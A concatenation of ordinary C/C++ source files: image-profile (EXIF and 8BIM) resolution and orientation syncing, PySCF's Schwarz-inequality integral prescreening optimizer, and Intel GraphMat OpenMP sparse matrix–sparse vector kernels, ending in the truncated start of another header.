%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SyncImageProfiles() synchronizes image properties with the image profiles.
% Currently we only support updating the EXIF resolution and orientation.
%
% The format of the SyncImageProfiles method is:
%
% MagickBooleanType SyncImageProfiles(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
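/*
A minimal usage sketch: after changing the image resolution or
orientation, push the new values into the 8BIM and EXIF profiles so
they stay consistent when the image is written:

image->x_resolution=300.0;
image->y_resolution=300.0;
image->units=PixelsPerInchResolution;
(void) SyncImageProfiles(image);
*/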
static inline int ReadProfileByte(unsigned char **p,size_t *length)
{
int
c;
if (*length < 1)
return(EOF);
c=(int) (*(*p)++);
(*length)--;
return(c);
}
static inline signed short ReadProfileShort(const EndianType endian,
unsigned char *buffer)
{
union
{
unsigned int
unsigned_value;
signed int
signed_value;
} quantum;
unsigned short
value;
if (endian == LSBEndian)
{
value=(unsigned short) buffer[1] << 8;
value|=(unsigned short) buffer[0];
quantum.unsigned_value=value & 0xffff;
return(quantum.signed_value);
}
value=(unsigned short) buffer[0] << 8;
value|=(unsigned short) buffer[1];
quantum.unsigned_value=value & 0xffff;
return(quantum.signed_value);
}
static inline signed int ReadProfileLong(const EndianType endian,
unsigned char *buffer)
{
union
{
unsigned int
unsigned_value;
signed int
signed_value;
} quantum;
unsigned int
value;
if (endian == LSBEndian)
{
value=(unsigned int) buffer[3] << 24;
value|=(unsigned int) buffer[2] << 16;
value|=(unsigned int) buffer[1] << 8;
value|=(unsigned int) buffer[0];
quantum.unsigned_value=value & 0xffffffff;
return(quantum.signed_value);
}
value=(unsigned int) buffer[0] << 24;
value|=(unsigned int) buffer[1] << 16;
value|=(unsigned int) buffer[2] << 8;
value|=(unsigned int) buffer[3];
quantum.unsigned_value=value & 0xffffffff;
return(quantum.signed_value);
}
static inline signed int ReadProfileMSBLong(unsigned char **p,size_t *length)
{
signed int
value;
if (*length < 4)
return(0);
value=ReadProfileLong(MSBEndian,*p);
(*length)-=4;
*p+=4;
return(value);
}
static inline signed short ReadProfileMSBShort(unsigned char **p,
size_t *length)
{
signed short
value;
if (*length < 2)
return(0);
value=ReadProfileShort(MSBEndian,*p);
(*length)-=2;
*p+=2;
return(value);
}
static inline void WriteProfileLong(const EndianType endian,
const size_t value,unsigned char *p)
{
unsigned char
buffer[4];
if (endian == LSBEndian)
{
buffer[0]=(unsigned char) value;
buffer[1]=(unsigned char) (value >> 8);
buffer[2]=(unsigned char) (value >> 16);
buffer[3]=(unsigned char) (value >> 24);
(void) memcpy(p,buffer,4);
return;
}
buffer[0]=(unsigned char) (value >> 24);
buffer[1]=(unsigned char) (value >> 16);
buffer[2]=(unsigned char) (value >> 8);
buffer[3]=(unsigned char) value;
(void) memcpy(p,buffer,4);
}
static void WriteProfileShort(const EndianType endian,
const unsigned short value,unsigned char *p)
{
unsigned char
buffer[2];
if (endian == LSBEndian)
{
buffer[0]=(unsigned char) value;
buffer[1]=(unsigned char) (value >> 8);
(void) memcpy(p,buffer,2);
return;
}
buffer[0]=(unsigned char) (value >> 8);
buffer[1]=(unsigned char) value;
(void) memcpy(p,buffer,2);
}
static MagickBooleanType Sync8BimProfile(Image *image,StringInfo *profile)
{
size_t
length;
ssize_t
count;
unsigned char
*p;
unsigned short
id;
length=GetStringInfoLength(profile);
p=GetStringInfoDatum(profile);
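/* Scan byte-by-byte for the next "8BIM" (0x38 0x42 0x49 0x4D) marker. */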
while (length != 0)
{
if (ReadProfileByte(&p,&length) != 0x38)
continue;
if (ReadProfileByte(&p,&length) != 0x42)
continue;
if (ReadProfileByte(&p,&length) != 0x49)
continue;
if (ReadProfileByte(&p,&length) != 0x4D)
continue;
if (length < 7)
return(MagickFalse);
id=ReadProfileMSBShort(&p,&length);
count=(ssize_t) ReadProfileByte(&p,&length);
if ((count >= (ssize_t) length) || (count < 0))
return(MagickFalse);
p+=count;
length-=count;
if ((*p & 0x01) == 0)
(void) ReadProfileByte(&p,&length);
count=(ssize_t) ReadProfileMSBLong(&p,&length);
if ((count > (ssize_t) length) || (count < 0))
return(MagickFalse);
if ((id == 0x3ED) && (count == 16))
{
if (image->units == PixelsPerCentimeterResolution)
WriteProfileLong(MSBEndian,(unsigned int) (image->x_resolution*2.54*
65536.0),p);
else
WriteProfileLong(MSBEndian,(unsigned int) (image->x_resolution*
65536.0),p);
WriteProfileShort(MSBEndian,(unsigned short) image->units,p+4);
if (image->units == PixelsPerCentimeterResolution)
WriteProfileLong(MSBEndian,(unsigned int) (image->y_resolution*2.54*
65536.0),p+8);
else
WriteProfileLong(MSBEndian,(unsigned int) (image->y_resolution*
65536.0),p+8);
WriteProfileShort(MSBEndian,(unsigned short) image->units,p+12);
}
p+=count;
length-=count;
}
return(MagickTrue);
}
static MagickBooleanType SyncExifProfile(Image *image, StringInfo *profile)
{
#define MaxDirectoryStack 16
#define EXIF_DELIMITER "\n"
#define EXIF_NUM_FORMATS 12
#define TAG_EXIF_OFFSET 0x8769
#define TAG_INTEROP_OFFSET 0xa005
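/*
TIFF/EXIF layout assumed below: a 2-byte byte-order mark ("II" little
endian, "MM" big endian), the magic number 0x002a, then a 4-byte offset
to the first IFD. Each IFD is a 2-byte entry count followed by 12-byte
entries: tag (2), format (2), component count (4), and a 4-byte
value-or-offset; values wider than 4 bytes live at the offset.
*/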
typedef struct _DirectoryInfo
{
unsigned char
*directory;
size_t
entry;
} DirectoryInfo;
DirectoryInfo
directory_stack[MaxDirectoryStack];
EndianType
endian;
size_t
entry,
length,
number_entries;
SplayTreeInfo
*exif_resources;
ssize_t
id,
level,
offset;
static int
format_bytes[] = {0, 1, 1, 2, 4, 8, 1, 1, 2, 4, 8, 4, 8};
unsigned char
*directory,
*exif;
/*
Set EXIF resolution tag.
*/
length=GetStringInfoLength(profile);
exif=GetStringInfoDatum(profile);
if (length < 16)
return(MagickFalse);
id=(ssize_t) ReadProfileShort(LSBEndian,exif);
if ((id != 0x4949) && (id != 0x4D4D))
{
while (length != 0)
{
if (ReadProfileByte(&exif,&length) != 0x45)
continue;
if (ReadProfileByte(&exif,&length) != 0x78)
continue;
if (ReadProfileByte(&exif,&length) != 0x69)
continue;
if (ReadProfileByte(&exif,&length) != 0x66)
continue;
if (ReadProfileByte(&exif,&length) != 0x00)
continue;
if (ReadProfileByte(&exif,&length) != 0x00)
continue;
break;
}
if (length < 16)
return(MagickFalse);
id=(ssize_t) ReadProfileShort(LSBEndian,exif);
}
endian=LSBEndian;
if (id == 0x4949)
endian=LSBEndian;
else
if (id == 0x4D4D)
endian=MSBEndian;
else
return(MagickFalse);
if (ReadProfileShort(endian,exif+2) != 0x002a)
return(MagickFalse);
/*
This is the offset to the first IFD.
*/
offset=(ssize_t) ReadProfileLong(endian,exif+4);
if ((offset < 0) || ((size_t) offset >= length))
return(MagickFalse);
directory=exif+offset;
level=0;
entry=0;
exif_resources=NewSplayTree((int (*)(const void *,const void *)) NULL,
(void *(*)(void *)) NULL,(void *(*)(void *)) NULL);
do
{
if (level > 0)
{
level--;
directory=directory_stack[level].directory;
entry=directory_stack[level].entry;
}
if ((directory < exif) || (directory > (exif+length-2)))
break;
/*
Determine how many entries there are in the current IFD.
*/
number_entries=ReadProfileShort(endian,directory);
for ( ; entry < number_entries; entry++)
{
int
components;
register unsigned char
*p,
*q;
size_t
number_bytes;
ssize_t
format,
tag_value;
q=(unsigned char *) (directory+2+(12*entry));
if (q > (exif+length-12))
break; /* corrupt EXIF */
if (GetValueFromSplayTree(exif_resources,q) == q)
break;
(void) AddValueToSplayTree(exif_resources,q,q);
tag_value=(ssize_t) ReadProfileShort(endian,q);
format=(ssize_t) ReadProfileShort(endian,q+2);
if ((format < 0) || ((format-1) >= EXIF_NUM_FORMATS))
break;
components=(int) ReadProfileLong(endian,q+4);
if (components < 0)
break; /* corrupt EXIF */
number_bytes=(size_t) components*format_bytes[format];
if ((ssize_t) number_bytes < components)
break; /* prevent overflow */
if (number_bytes <= 4)
p=q+8;
else
{
/*
The directory entry contains an offset.
*/
offset=(ssize_t) ReadProfileLong(endian,q+8);
if ((offset < 0) || ((size_t) (offset+number_bytes) > length))
continue;
if (~length < number_bytes)
continue; /* prevent overflow */
p=(unsigned char *) (exif+offset);
}
switch (tag_value)
{
case 0x011a:
{
(void) WriteProfileLong(endian,(size_t) (image->x_resolution+0.5),p);
(void) WriteProfileLong(endian,1UL,p+4);
break;
}
case 0x011b:
{
(void) WriteProfileLong(endian,(size_t) (image->y_resolution+0.5),p);
(void) WriteProfileLong(endian,1UL,p+4);
break;
}
case 0x0112:
{
if (number_bytes == 4)
{
(void) WriteProfileLong(endian,(size_t) image->orientation,p);
break;
}
(void) WriteProfileShort(endian,(unsigned short) image->orientation,
p);
break;
}
case 0x0128:
{
if (number_bytes == 4)
{
(void) WriteProfileLong(endian,(size_t) (image->units+1),p);
break;
}
(void) WriteProfileShort(endian,(unsigned short) (image->units+1),p);
break;
}
default:
break;
}
if ((tag_value == TAG_EXIF_OFFSET) || (tag_value == TAG_INTEROP_OFFSET))
{
offset=(ssize_t) ReadProfileLong(endian,p);
if (((size_t) offset < length) && (level < (MaxDirectoryStack-2)))
{
directory_stack[level].directory=directory;
entry++;
directory_stack[level].entry=entry;
level++;
directory_stack[level].directory=exif+offset;
directory_stack[level].entry=0;
level++;
if ((directory+2+(12*number_entries)) > (exif+length))
break;
offset=(ssize_t) ReadProfileLong(endian,directory+2+(12*
number_entries));
if ((offset != 0) && ((size_t) offset < length) &&
(level < (MaxDirectoryStack-2)))
{
directory_stack[level].directory=exif+offset;
directory_stack[level].entry=0;
level++;
}
}
break;
}
}
} while (level > 0);
exif_resources=DestroySplayTree(exif_resources);
return(MagickTrue);
}
MagickExport MagickBooleanType SyncImageProfiles(Image *image)
{
MagickBooleanType
status;
StringInfo
*profile;
status=MagickTrue;
profile=(StringInfo *) GetImageProfile(image,"8BIM");
if (profile != (StringInfo *) NULL)
if (Sync8BimProfile(image,profile) == MagickFalse)
status=MagickFalse;
profile=(StringInfo *) GetImageProfile(image,"EXIF");
if (profile != (StringInfo *) NULL)
if (SyncExifProfile(image,profile) == MagickFalse)
status=MagickFalse;
return(status);
}
|
optimizer.c | /* Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*
* Author: Qiming Sun <osirpt.sun@gmail.com>
*/
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <assert.h>
#include "cint.h"
#include "cvhf.h"
#include "optimizer.h"
#define MAX(I,J) ((I) > (J) ? (I) : (J))
int int2e_sph();
int GTOmax_cache_size(int (*intor)(), int *shls_slice, int ncenter,
int *atm, int natm, int *bas, int nbas, double *env);
void CVHFinit_optimizer(CVHFOpt **opt, int *atm, int natm,
int *bas, int nbas, double *env)
{
CVHFOpt *opt0 = (CVHFOpt *)malloc(sizeof(CVHFOpt));
opt0->nbas = nbas;
opt0->direct_scf_cutoff = 1e-14;
opt0->q_cond = NULL;
opt0->dm_cond = NULL;
opt0->fprescreen = &CVHFnoscreen;
opt0->r_vkscreen = &CVHFr_vknoscreen;
*opt = opt0;
}
void CVHFdel_optimizer(CVHFOpt **opt)
{
CVHFOpt *opt0 = *opt;
if (!opt0) {
return;
}
/* free the screening buffers only if they were actually allocated */
if (opt0->q_cond) {
free(opt0->q_cond);
}
if (opt0->dm_cond) {
free(opt0->dm_cond);
}
free(opt0);
*opt = NULL;
}
int CVHFnoscreen(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
return 1;
}
int CVHFnr_schwarz_cond(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
if (!opt) {
return 1;
}
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int n = opt->nbas;
assert(opt->q_cond);
assert(i < n);
assert(j < n);
assert(k < n);
assert(l < n);
double qijkl = opt->q_cond[i*n+j] * opt->q_cond[k*n+l];
return qijkl > opt->direct_scf_cutoff;
}
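/* Prescreen a shell quartet (ij|kl): the Schwarz inequality gives
* |(ij|kl)| <= sqrt((ij|ij)) * sqrt((kl|kl)) = q_cond[i,j] * q_cond[k,l],
* and the quartet can also be dropped when every density-matrix element
* that would multiply it is below dmin. */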
int CVHFnrs8_prescreen(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
if (!opt) {
return 1; // no screen
}
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int n = opt->nbas;
assert(opt->q_cond);
assert(opt->dm_cond);
assert(i < n);
assert(j < n);
assert(k < n);
assert(l < n);
double qijkl = opt->q_cond[i*n+j] * opt->q_cond[k*n+l];
double dmin = opt->direct_scf_cutoff / qijkl;
return qijkl > opt->direct_scf_cutoff
&&((4*opt->dm_cond[j*n+i] > dmin)
|| (4*opt->dm_cond[l*n+k] > dmin)
|| ( opt->dm_cond[j*n+k] > dmin)
|| ( opt->dm_cond[j*n+l] > dmin)
|| ( opt->dm_cond[i*n+k] > dmin)
|| ( opt->dm_cond[i*n+l] > dmin));
}
// return flag to decide whether transpose01324
int CVHFr_vknoscreen(int *shls, CVHFOpt *opt,
double **dms_cond, int n_dm, double *dm_atleast,
int *atm, int *bas, double *env)
{
int idm;
for (idm = 0; idm < n_dm; idm++) {
dms_cond[idm] = NULL;
}
*dm_atleast = 0;
return 1;
}
void CVHFset_direct_scf_cutoff(CVHFOpt *opt, double cutoff)
{
opt->direct_scf_cutoff = cutoff;
}
double CVHFget_direct_scf_cutoff(CVHFOpt *opt)
{
return opt->direct_scf_cutoff;
}
void CVHFsetnr_direct_scf(CVHFOpt *opt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
/* This memory is released in CVHFdel_optimizer; it is unclear why
* valgrind reports a leak here. */
if (opt->q_cond) {
free(opt->q_cond);
}
opt->q_cond = (double *)malloc(sizeof(double) * nbas*nbas);
int shls_slice[] = {0, nbas};
const int cache_size = GTOmax_cache_size(intor, shls_slice, 1,
atm, natm, bas, nbas, env);
#pragma omp parallel default(none) \
shared(opt, intor, cintopt, ao_loc, atm, natm, bas, nbas, env)
{
double qtmp, tmp;
int ij, i, j, di, dj, ish, jsh;
int shls[4];
double *cache = malloc(sizeof(double) * cache_size);
di = 0;
for (ish = 0; ish < nbas; ish++) {
dj = ao_loc[ish+1] - ao_loc[ish];
di = MAX(di, dj);
}
double *buf = malloc(sizeof(double) * di*di*di*di);
#pragma omp for schedule(dynamic, 4)
for (ij = 0; ij < nbas*(nbas+1)/2; ij++) {
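/* decode the flattened lower-triangle index: ij = ish*(ish+1)/2 + jsh */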
ish = (int)(sqrt(2*ij+.25) - .5 + 1e-7);
jsh = ij - ish*(ish+1)/2;
di = ao_loc[ish+1] - ao_loc[ish];
dj = ao_loc[jsh+1] - ao_loc[jsh];
shls[0] = ish;
shls[1] = jsh;
shls[2] = ish;
shls[3] = jsh;
qtmp = 1e-100;
if (0 != (*intor)(buf, NULL, shls, atm, natm, bas, nbas, env,
cintopt, cache)) {
for (i = 0; i < di; i++) {
for (j = 0; j < dj; j++) {
tmp = fabs(buf[i+di*j+di*dj*i+di*dj*di*j]);
qtmp = MAX(qtmp, tmp);
} }
qtmp = sqrt(qtmp);
}
opt->q_cond[ish*nbas+jsh] = qtmp;
opt->q_cond[jsh*nbas+ish] = qtmp;
}
free(buf);
free(cache);
}
}
void CVHFsetnr_direct_scf_dm(CVHFOpt *opt, double *dm, int nset, int *ao_loc,
int *atm, int natm, int *bas, int nbas, double *env)
{
if (opt->dm_cond) { // NOT reuse opt->dm_cond because nset may be diff in different call
free(opt->dm_cond);
}
opt->dm_cond = (double *)malloc(sizeof(double) * nbas*nbas);
memset(opt->dm_cond, 0, sizeof(double)*nbas*nbas);
const int nao = ao_loc[nbas];
double dmax, tmp;
int i, j, ish, jsh;
int iset;
double *pdm;
for (ish = 0; ish < nbas; ish++) {
for (jsh = 0; jsh < nbas; jsh++) {
dmax = 0;
for (iset = 0; iset < nset; iset++) {
pdm = dm + nao*nao*iset;
for (i = ao_loc[ish]; i < ao_loc[ish+1]; i++) {
for (j = ao_loc[jsh]; j < ao_loc[jsh+1]; j++) {
tmp = fabs(pdm[i*nao+j]);
dmax = MAX(dmax, tmp);
} }
}
opt->dm_cond[ish*nbas+jsh] = dmax;
} }
}
/*
*************************************************
*/
void CVHFnr_optimizer(CVHFOpt **vhfopt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
CVHFinit_optimizer(vhfopt, atm, natm, bas, nbas, env);
(*vhfopt)->fprescreen = &CVHFnrs8_prescreen;
CVHFsetnr_direct_scf(*vhfopt, intor, cintopt, ao_loc,
atm, natm, bas, nbas, env);
}
|
spmspv.h | /******************************************************************************
* ** Copyright (c) 2016, Intel Corporation **
* ** All rights reserved. **
* ** **
* ** Redistribution and use in source and binary forms, with or without **
* ** modification, are permitted provided that the following conditions **
* ** are met: **
* ** 1. Redistributions of source code must retain the above copyright **
* ** notice, this list of conditions and the following disclaimer. **
* ** 2. Redistributions in binary form must reproduce the above copyright **
* ** notice, this list of conditions and the following disclaimer in the **
* ** documentation and/or other materials provided with the distribution. **
* ** 3. Neither the name of the copyright holder nor the names of its **
* ** contributors may be used to endorse or promote products derived **
* ** from this software without specific prior written permission. **
* ** **
* ** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS **
* ** "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT **
* ** LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR **
* ** A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT **
* ** HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, **
* ** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED **
* ** TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR **
* ** PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF **
* ** LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING **
* ** NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS **
* ** SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
* * ******************************************************************************/
/* Narayanan Sundaram (Intel Corp.), Michael Anderson (Intel Corp.)
* * ******************************************************************************/
#ifndef SRC_SINGLENODE_SPMSPV_H_
#define SRC_SINGLENODE_SPMSPV_H_
#include <xmmintrin.h>
#include <omp.h> /* omp_get_max_threads() in my_csrspmspv() */
#include "GMDP/utils/bitvector.h"
template <typename Ta, typename Tx, typename Ty>
void my_spmspv(int* row_inds, int* col_ptrs, int* col_indices, Ta* vals,
int num_partitions, int* row_pointers, int* col_starts,
int* edge_pointers, Tx* xvalue, int * xbit_vector, Ty* yvalue,
int * ybit_vector, int m, int n, int* nnz, void (*op_mul)(const Ta&, const Tx&, Ty*, void*),
void (*op_add)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
// int * new_nnz = new int[num_partitions];
// memset(new_nnz, 0, num_partitions * sizeof(int));
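// Partitions are assumed to cover disjoint row ranges, so concurrent
// updates to yvalue/ybit_vector never collide across threads.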
#pragma omp parallel for schedule(dynamic, 1)
for (int p = 0; p < num_partitions; p++) {
// For each column
const int* column_offset = col_indices + col_starts[p];
const int* partitioned_row_offset = row_inds + edge_pointers[p];
const Ta* partitioned_val_offset = vals + edge_pointers[p];
const int* col_ptrs_cur = col_ptrs + col_starts[p];
for (int j = 0; j < (col_starts[p + 1] - col_starts[p]) - 1 ; j++) {
int col_index = col_indices[col_starts[p] + j];
if(get_bitvector(col_index, xbit_vector)) {
Tx Xval = xvalue[col_index];
_mm_prefetch((char*)(xvalue + column_offset[j + 4]), _MM_HINT_T0); // speculative prefetch; note column_offset[j + 4] can read past the final columns
int nz_idx = col_ptrs_cur[j];
for (; nz_idx < col_ptrs_cur[j + 1]; nz_idx++) {
int row_ind = partitioned_row_offset[nz_idx];
Ta Aval = partitioned_val_offset[nz_idx];
Ty temp_mul_result;
op_mul(Aval, Xval, &temp_mul_result, vsp);
if(get_bitvector(row_ind, ybit_vector))
{
//Ty temp_y_copy = yvalue[row_ind];
//op_add(temp_y_copy, temp_mul_result, &(yvalue[row_ind]), vsp);
op_add(yvalue[row_ind], temp_mul_result, &(yvalue[row_ind]), vsp);
}
else
{
yvalue[row_ind] = temp_mul_result;
set_bitvector(row_ind, ybit_vector);
}
}
}
}
}
// Per-partition nnz tracking is disabled (see the commented-out
// new_nnz buffer above); report the dense upper bound instead.
*nnz = m * n;
}
template <typename Ta, typename Tx, typename Ty>
void my_csrspmspv(Ta* a, int* ia, int* ja, Tx* xvalue, int * xbit_vector,
Ty* yvalue, int * ybit_vector, int m, int n, int* nnz,
void (*op_mul)(const Ta&, const Tx&, Ty*, void*), void (*op_add)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
int num_partitions = omp_get_max_threads() * 4;
int rows_per_partition = (m + num_partitions - 1) / num_partitions;
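// Round up to a multiple of 32 so no two partitions share a word of
// the 32-bit output bitvector.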
rows_per_partition = ((rows_per_partition + 31) / 32) * 32;
#pragma omp parallel for schedule(dynamic, 1)
for(int partition = 0 ; partition < num_partitions ; partition++)
{
int start_row = partition * rows_per_partition;
int end_row = (partition+1) * rows_per_partition;
if(end_row > m) end_row = m;
for(int row = start_row ; row < end_row ; row++)
{
bool row_exists = get_bitvector(row, ybit_vector);
Ty yval;
if(row_exists)
{
yval = yvalue[row];
}
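// ia/ja here use 1-based (Fortran-style) CSR indexing, hence the nz-1
// and the -1 on column ids below.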
for (int nz = ia[row]; nz < ia[row + 1]; nz++) {
Ty tmp_mul;
int col_id = ja[nz-1]-1;
if(get_bitvector(col_id, xbit_vector))
{
op_mul(a[nz - 1], xvalue[col_id], &tmp_mul, vsp);
if(row_exists)
{
Ty tmp_add = yval;
op_add(tmp_add, tmp_mul, &yval, vsp);
}
else
{
yval = tmp_mul;
set_bitvector(row, ybit_vector);
row_exists=true;
}
}
}
if(row_exists)
{
yvalue[row] = yval;
}
}
}
//*nnz = m * n;
}
template <typename Ta, typename Tx, typename Ty>
void my_dcsrspmspv(Ta* a, int* ia, int* ja, int * row_ids, int num_rows, int * partition_ptrs, int num_partitions,
Tx* xvalue, int * xbit_vector,
Ty* yvalue, int * ybit_vector, int m, int n, int* nnz,
void (*op_mul)(const Ta&, const Tx&, Ty*, void*), void (*op_add)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
#pragma omp parallel for schedule(dynamic, 1)
for(int p = 0 ; p < num_partitions ; p++)
{
for(int _row = partition_ptrs[p] ; _row < partition_ptrs[p+1] ; _row++)
{
int row = row_ids[_row];
bool row_exists = get_bitvector(row, ybit_vector);
Ty yval;
if(row_exists)
{
yval = yvalue[row];
}
for (int nz = ia[_row]; nz < ia[_row + 1]; nz++) {
Ty tmp_mul;
int col_id = ja[nz];
if(get_bitvector(col_id, xbit_vector))
{
op_mul(a[nz], xvalue[col_id], &tmp_mul, vsp);
if(row_exists)
{
Ty tmp_add = yval;
op_add(tmp_add, tmp_mul, &yval, vsp);
}
else
{
yval = tmp_mul;
row_exists=true;
}
}
}
if(row_exists)
{
set_bitvector(row, ybit_vector);
yvalue[row] = yval;
}
}
}
}
template <typename Ta, typename Tx, typename Ty>
void my_coospmspv(Ta* a, int* ia, int* ja, int num_partitions, int * partition_starts,
Tx* xvalue, int * xbit_vector,
Ty* yvalue, int * ybit_vector, int m, int n, int* nnz,
void (*op_mul)(const Ta&, const Tx&, Ty*, void*), void (*op_add)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
#pragma omp parallel for schedule(dynamic, 1)
for(int partition = 0 ; partition < num_partitions ; partition++)
{
for(int nz = partition_starts[partition] ; nz < partition_starts[partition+1] ; nz++)
{
int row = ia[nz]-1;
int col = ja[nz]-1;
#ifdef __DEBUG
assert(row < m);
assert(row >= 0);
assert(col < n);
assert(col >= 0);
#endif
if(get_bitvector(col, xbit_vector))
{
Ty tmp_mul;
op_mul(a[nz], xvalue[col], &tmp_mul, vsp);
bool row_exists = get_bitvector(row, ybit_vector);
if(!row_exists)
{
yvalue[row] = tmp_mul;
}
else
{
Ty tmp_add = yvalue[row];
Ty yval;
op_add(tmp_add, tmp_mul, &yval, vsp);
yvalue[row] = yval;
}
set_bitvector(row, ybit_vector);
}
}
}
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const DCSCTile<Ta>* tile, DenseSegment<Tx>* segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 1\n");
#endif
my_spmspv(tile->row_inds, tile->col_ptrs, tile->col_indices, tile->vals,
tile->num_partitions, tile->row_pointers, tile->col_starts,
tile->edge_pointers, segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->m, tile->n, (&segmenty->properties->nnz),
mul_fp, add_fp, vsp);
segmenty->properties->nnz = segmenty->compute_nnz();
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const HybridTile<Ta>* tile, const DenseSegment<Tx> * segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 2\n");
#endif
int nnz = 0;
if(tile->t1->nnz > 0)
{
my_dcsrspmspv(tile->t1->a, tile->t1->ia, tile->t1->ja, tile->t1->row_ids, tile->t1->num_rows, tile->t1->partition_ptrs, tile->t1->num_partitions, segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->t1->m, tile->t1->n, (&nnz),
mul_fp, add_fp, vsp);
}
if(tile->t2->nnz > 0)
{
my_coospmspv(tile->t2->a, tile->t2->ia, tile->t2->ja, tile->t2->num_partitions, tile->t2->partition_start,
segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->t2->m, tile->t2->n, (&nnz),
mul_fp, add_fp, vsp);
}
segmenty->properties->nnz = segmenty->compute_nnz();
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const CSRTile<Ta>* tile, const DenseSegment<Tx> * segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 3\n");
#endif
int nnz = 0;
if(tile->nnz > 0)
{
my_csrspmspv(tile->a, tile->ia, tile->ja, segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->m, tile->n, (&nnz),
mul_fp, add_fp, vsp);
}
segmenty->properties->nnz = segmenty->compute_nnz();
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const COOTile<Ta>* tile, const DenseSegment<Tx>* segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 4\n");
#endif
int nnz = 0;
if(tile->nnz > 0)
{
my_coospmspv(tile->a, tile->ia, tile->ja, tile->num_partitions, tile->partition_start,
segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->m, tile->n, (&nnz),
mul_fp, add_fp, vsp);
}
segmenty->properties->nnz = segmenty->compute_nnz();
}
template <typename Ta, typename Tx, typename Ty>
void mult_segment(const COOSIMD32Tile<Ta>* tile, const DenseSegment<Tx>* segmentx,
DenseSegment<Ty>* segmenty,
void (*mul_fp)(const Ta&, const Tx&, Ty*, void*), void (*add_fp)(const Ty&, const Ty&, Ty*, void*), void* vsp) {
segmenty->alloc();
segmenty->initialize();
#ifdef __TIMING
printf("\t\tIn here 5\n");
#endif
int nnz = 0;
if(tile->nnz > 0)
{
my_coospmspv(tile->a, tile->ia, tile->ja, tile->num_partitions, tile->partition_start,
segmentx->properties->value, segmentx->properties->bit_vector,
segmenty->properties->value, segmenty->properties->bit_vector, tile->m, tile->n, (&nnz),
mul_fp, add_fp, vsp);
}
segmenty->properties->nnz = segmenty->compute_nnz();
}
#endif // SRC_SINGLENODE_SPMSPV_H_
|
cwa_smd.h | #ifndef METHODS_CWA_SMD_H
#define METHODS_CWA_SMD_H
namespace method {
namespace cwa_smd {
namespace details {
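// Weighted phase-space average over the grid:
// <f> = sum_i w_i f(x_i / s) / sum_i w_i, with per-dimension scaling s.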
template<typename Function>
auto expectation(const Function & function,
const arma::mat & points,
const arma::vec & weights,
const arma::vec & scaling) {
const arma::mat scaled_points = arma::diagmat(1 / scaling) * points;
auto result = at(function, scaled_points);
return arma::dot(result, weights) / arma::sum(weights);
}
template<typename T>
